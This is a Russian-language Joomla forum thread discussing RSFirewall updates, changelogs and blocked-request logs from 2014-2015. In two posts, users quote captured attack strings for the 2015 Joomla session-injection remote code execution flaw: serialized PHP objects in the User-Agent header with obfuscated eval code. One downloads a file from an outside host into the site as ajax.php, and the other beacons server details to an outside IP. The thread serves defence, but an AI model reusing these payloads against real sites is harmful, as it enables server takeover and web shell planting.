Как создать и настроить свой веб-сервер на VDS (05 сен 2024)

Осенью самое время заняться установкой и тюнингом своего веб-сервера. Не правда ли?

Безопасность и Joomla. RSFirewall

Больше
10 года 3 мес. назад - 10 года 3 мес. назад #21 от serge
serge ответил в теме Безопасность и Joomla. RSFirewall
Внимание, RSFirewall сегодня обновился до v.2.6.0, и новая версия содержит не только фиксы и апдейты, но и некоторые новшества:

27 August 2014 - 2.6.0

  • Updated - Improved detection of base64 encoded strings during the System Check.
  • Updated - When XDebug is enabled in PHP, the System Check is no longer available.
  • Updated - Joomla! and RSFirewall! version checking now uses caching.
  • Added - A timeout can now be set between requests during the System Check.
  • Added - 'Google bot' is now whitelisted internally.
  • Fixed - IPs are now trimmed of extra spaces.
  • Fixed - Slightly improved error messages when the System Check failed.
  • Fixed - When the System Check fails, the grade is no longer calculated.
  • Fixed - System Check might have been flagged as a bruteforce attack by some server firewalls because it posted requests to 'index.php'.



Учитывая ваши, Sergos, недавние проблемы с блокировкой американцев - выделенный мной пункт оказывается совсем не лишним... возможно, не только у нас несчастных янки пытаются блокировать, напарываясь на то странное обстоятельство, что Google bot тоже, оказывается, американский?? :laugh: :laugh:

А я смогу! - А поглядим! - А я упрямый!
Последнее редактирование: 10 года 3 мес. назад пользователем serge.
Спасибо сказали: Sergos

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Dev banner 1
Больше
10 года 1 мес. назад - 10 года 1 мес. назад #22 от serge
serge ответил в теме Безопасность и Joomla. RSFirewall
Внимание, RSFirewall основательно обновился, встречайте: RSFirewall! - Version 2.7.0 - 15 October 2014.
В числе прочего - добавлена функция spam protection:


  • Added - Added spam protection for forms (can be enabled in Firewall Configuration - Active Scanner).
  • Added - Added support for IPv6.
  • Added - Added support for CIDR notation and IP ranges.
  • Added - 'File Manager' (from Firewall Configuration > System Check) now displays file size and permissions.
  • Added - IPs can now be blocked easier straight from the 'System Logs' area.
  • Added - IPs can now be whitelisted from the 'System Logs' area.
  • Updated - False positive results in 'Malware check' can be instantly ignored by clicking a button.
  • Updated - If GeoIP is available, a country flag is shown next to each IP in the 'System Logs'.
  • Updated - 'Bing Bot' is now whitelisted by default.
  • Updated - 'Malware check' improved - checks for rogue files in the Joomla! root as well as other folders that shouldn't contain PHP files.
  • Updated - No longer recommending 'allow_url_fopen' to be disabled since it caused issues with the Joomla! auto-updater.
  • Updated - No longer recommending placing 'configuration.php' outside root since it proved to bring minimal benefits at the cost of modifying core files.
  • Updated - GeoIP.dat.gz can now be uploaded and will be decompressed automatically.
  • Updated - Hosting server's IP can no longer be blacklisted.
  • Fixed - Using a broken GeoIP database no longer renders website unusable.
  • Fixed - Worked around bug in Joomla! 3 that prevented the action dropdown (in item listing) from functioning correctly.
  • Fixed - Clicking 'Accept changes' for modified Joomla! core files wasn't disabling the checkboxes.


Я обратил внимание на некоторые ложные срабатывания при сканировании системы (php-файлы в каталоге /images/fbfiles) в новой версии RSFirewall. Но это ерунда, да и участник команды RSJoomla дает подробные разъяснения на этот счет:

Andrei Cristea wrote:

Hello,
These files are not harmful to your installation, as the comment inside the files state:
this is a dummy file and intentionally left blank
do not remove from ditribution package

Joomla! uses blank index.html files in order to protect your folder/files listings from direct access, for example:

masterpro.ws/components/

Instead of using html files Kunena is using php files for this, RSFirewall! suspected an intrusion since the images folder should not contain any php files. You can avoid this from being reported again after a system check by adding the files in the `Ignore files and folders` field from Components > RSFirewall! > Firewall Configuration > System Check.

Regards!


А я смогу! - А поглядим! - А я упрямый!
Последнее редактирование: 10 года 1 мес. назад пользователем serge.

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Больше
10 года 3 нед. назад #23 от evgenij
evgenij ответил в теме Безопасность и Joomla. RSFirewall
Да, вижу. RSFirewall становится все более и более функциональным: функция spam protection обещает быть востребованной:

Added - Added spam protection for forms (can be enabled in Firewall Configuration - Active Scanner). Enabling this option will protect you forms from abusive IPs by checking if they exist in a PBL list.


Кто-нибудь уже тестил? Помогает?

Have a lot of fun!

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Больше
10 года 2 нед. назад #24 от serge
serge ответил в теме Безопасность и Joomla. RSFirewall

evgenij пишет: Кто-нибудь уже тестил? Помогает?


Да вроде работает. А нормальные люди, походу, без проблем регятся. ;)

Описание: This IP is listed in a spam database.
Уровень тревоги: средний
Дата события: 2014-11-12 18:09:06
IP адреса: 195.2.240.101
ID пользователя: 0
Имя пользователя:

Это электронное письмо было отправлено, т.к. RSFirewall! контролирует Ваш Joomla! сайт. Показ уведомлений может быть изменён в разделе 'Основные настройки', под вкладкой Утилиты входа.


А я смогу! - А поглядим! - А я упрямый!

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Больше
10 года 2 нед. назад - 10 года 2 нед. назад #25 от evgenij
evgenij ответил в теме Безопасность и Joomla. RSFirewall

serge пишет: В числе прочего - добавлена функция spam protection.


Интересное наблюдение. Защита от спама, судя по логам RSFirewall, явно способствует защите и от атак, эксплуатирующих различные дырки безопасности, вот свежий пример с JCE:

Страница:
index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20

Запрос: Нет запроса
Описание: This IP is listed in a spam database.
Уровень тревоги: средний
Дата события: 2014-11-19 11:18:20
IP адреса: 123.30.235.66
ID пользователя: 0


Have a lot of fun!
Последнее редактирование: 10 года 2 нед. назад пользователем evgenij.

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Больше
8 года 11 мес. назад #26 от Aleksej
Aleksej ответил в теме Безопасность и Joomla. RSFirewall
В свете последних событий - уязвимость нулевого дня , Remote code execution flaw via the user agent string - разработчики RSFirewall уже дважды обновляют свой продукт:

RSFirewall! Changelog

16 December 2015 - 2.9.2
Updated - Further improvements to session injection vulnerability prevention.

15 December 2015 - 2.9.1
Updated - User Agent Blacklist updated to prevent Joomla! session vulnerability.
Updated - Malware database updated.

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Больше
8 года 11 мес. назад - 8 года 11 мес. назад #27 от serge
serge ответил в теме Безопасность и Joomla. RSFirewall

Aleksej пишет: разработчики RSFirewall уже дважды обновляют свой продукт:


Сценарий атаки:

Code:
Пользовательский агент: }__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:954:"eval(chr(115).chr(121).chr(115).chr(116).chr(101).chr(109).chr(40).chr(39).chr(99).chr(100).chr(32).chr(99).chr(111).chr(109).chr(112).chr(111).chr(110).chr(101).chr(110).chr(116).chr(115).chr(59).chr(99).chr(100).chr(32).chr(99).chr(111).chr(109).chr(95).chr(109).chr(101).chr(100).chr(105).chr(97).chr(59).chr(114).chr(109).chr(32).chr(45).chr(114).chr(102).chr(32).chr(107).chr(46).chr(116).chr(120).chr(116).chr(59).chr(99).chr(117).chr(114).chr(108).chr(32).chr(45).chr(79).chr(32).chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47).chr(116).chr(105).chr(112).chr(116).chr(111).chr(112).chr(99).chr(111).chr(109).chr(46).chr(116).chr(118).chr(47).chr(98).chr(108).chr(111).chr(103).chr(47).chr(107).chr(46).chr(116).chr(120).chr(116).chr(59).chr(109).chr(118).chr(32).chr(107).chr(46).chr(116).chr(120).chr(116).chr(32).chr(97).chr(106).chr(97).chr(120).chr(46).chr(112).chr(104).chr(112).chr(39).chr(41).chr(59));JFactory::getConfig();exit";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}ðýýý

Еще по теме , кто не в курсе.

А я смогу! - А поглядим! - А я упрямый!
Последнее редактирование: 8 года 11 мес. назад пользователем serge.

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Больше
8 года 11 мес. назад #28 от Arhitektorius
Arhitektorius ответил в теме Безопасность и Joomla. RSFirewall
Свежачок!
Code:
Прям свежак! 146.0.72.80 - - [16/Dec/2015:10:43:52 +0300] "GET / HTTP/1.1" 200 13805 "-" "}__test|O:21:\"JDatabaseDriverMysqli":3:s:2:\"fc\";O:17:\"JSimplepieFactory":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:985:"eval(chr(36).chr(102).chr(112).chr(32).chr(61).chr(32).chr(102).chr(115).chr(111).chr(99).chr(107).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(49).chr(52).chr(54).chr(46).chr(48).chr(46).chr(55).chr(50).chr(46).chr(56).chr(48).chr(39).chr(44).chr(32).chr(56).chr(48).chr(41).chr(59).chr(32).chr(105).chr(102).chr(40).chr(36).chr(102).chr(112).chr(41).chr(32).chr(123).chr(32).chr(102).chr(119).chr(114).chr(105).chr(116).chr(101).chr(40).chr(36).chr(102).chr(112).chr(44).chr(32).chr(36).chr(95).chr(83).chr(69).chr(82).chr(86).chr(69).chr(82).chr(91).chr(39).chr(72).chr(84).chr(84).chr(80).chr(95).chr(72).chr(79).chr(83).chr(84).chr(39).chr(93).chr(46).chr(39).chr(32).chr(39).chr(46).chr(112).chr(104).chr(112).chr(118).chr(101).chr(114).chr(115).chr(105).chr(111).chr(110).chr(40).chr(41).chr(41).chr(59).chr(32).chr(102).chr(99).chr(108).chr(111).chr(115).chr(101).chr(40).chr(36).chr(102).chr(112).chr(41).chr(59).chr(32).chr(125).chr(32));JFactory::getConfig();exit\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\xfd\xfd\xfd"

Моё хобби стало моей проффесией ;)

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Больше
8 года 11 мес. назад - 8 года 11 мес. назад #29 от serge
serge ответил в теме Безопасность и Joomla. RSFirewall

Aleksej пишет: В свете последних событий - уязвимость нулевого дня , Remote code execution flaw via the user agent string - разработчики RSFirewall уже дважды обновляют свой продукт


да уже и не дважды... или, можно сказать, они уже дважды в день фигачат, как стахановцы. :laugh:


RSFirewall! Changelog

22 December 2015 - 2.9.5
Fixed - Reverted some functions so that Joomla! 2.5 is still supported.


22 December 2015 - 2.9.4
Updated - File paths in the Ignore files and Monitor files section are now stored with relative paths when backing up.
Updated - Can choose if you want to keep the Update Code from the configuration.json.
Fixed - Converting email addresses to images displayed a PHP Notice in some cases.


21 December 2015 - 2.9.3
Added - System Check now checks if the Session Handler is set to 'Database' and issues a warning.
Added - Select which headers to check for the real IP if server behind proxy (wasn't configurable until now).
Updated - Can now filter based on Blocked status in the System Logs area.
Updated - Debug information in System Logs hidden by default - a 'Show' button has been added to display it.
Fixed - Session injection protection did not automatically blacklist IPs.
Fixed - Language strings in the mod_rsfirewall module were not loaded if the System Plugin was disabled.
Fixed - In some cases, the System Check would write a log even if the option was disabled.
Fixed - Converting email addresses to images did not work with new (long) domain extensions.


16 December 2015 - 2.9.2
Updated - Further improvements to session injection vulnerability prevention.


15 December 2015 - 2.9.1
Updated - User Agent Blacklist updated to prevent Joomla! session vulnerability.
Updated - Malware database updated.


11 December 2015 - 2.9.0
Added - Can now view differences in modified core Joomla! files.
Added - Ability to deny referers by specifying the domain name.
Added - Export & import configuration data.
Added - Download System Logs in CSV format.
Updated - Country Flags are now displayed on the Blackist/Whitelist page.
Updated - Visually improved Backend Login and Forbidden views.
Updated - Backend Login and Forbidden views can be overrided through the template now.
Updated - No longer checking 'register_globals' and 'safe_mode' on PHP 5.4 and newer.
Updated - System Check last run time is now recorded.
Updated - Small interface improvements.
Updated - New malware signatures added to the database.
Fixed - Updating the component did not run the necessary queries when using MySQL (PDO).


А я смогу! - А поглядим! - А я упрямый!
Последнее редактирование: 8 года 11 мес. назад пользователем serge.

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Больше
8 года 9 мес. назад #30 от serge
serge ответил в теме Безопасность и Joomla. RSFirewall
Внимание, в новой ревизии RSFirewall изменился предлагаемый для open_basedir путь, он теперь выглядит следующим образом (привожу уже в таком виде, как должно быть записано в vhosts.conf ):

Code:
php_admin_value open_basedir '/www/vash_site_1:/tmp:/var/lib/php/session:/www/vash_site_1/tmp:/www/vash_site_1/log'

А я смогу! - А поглядим! - А я упрямый!

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Работает на Kunena форум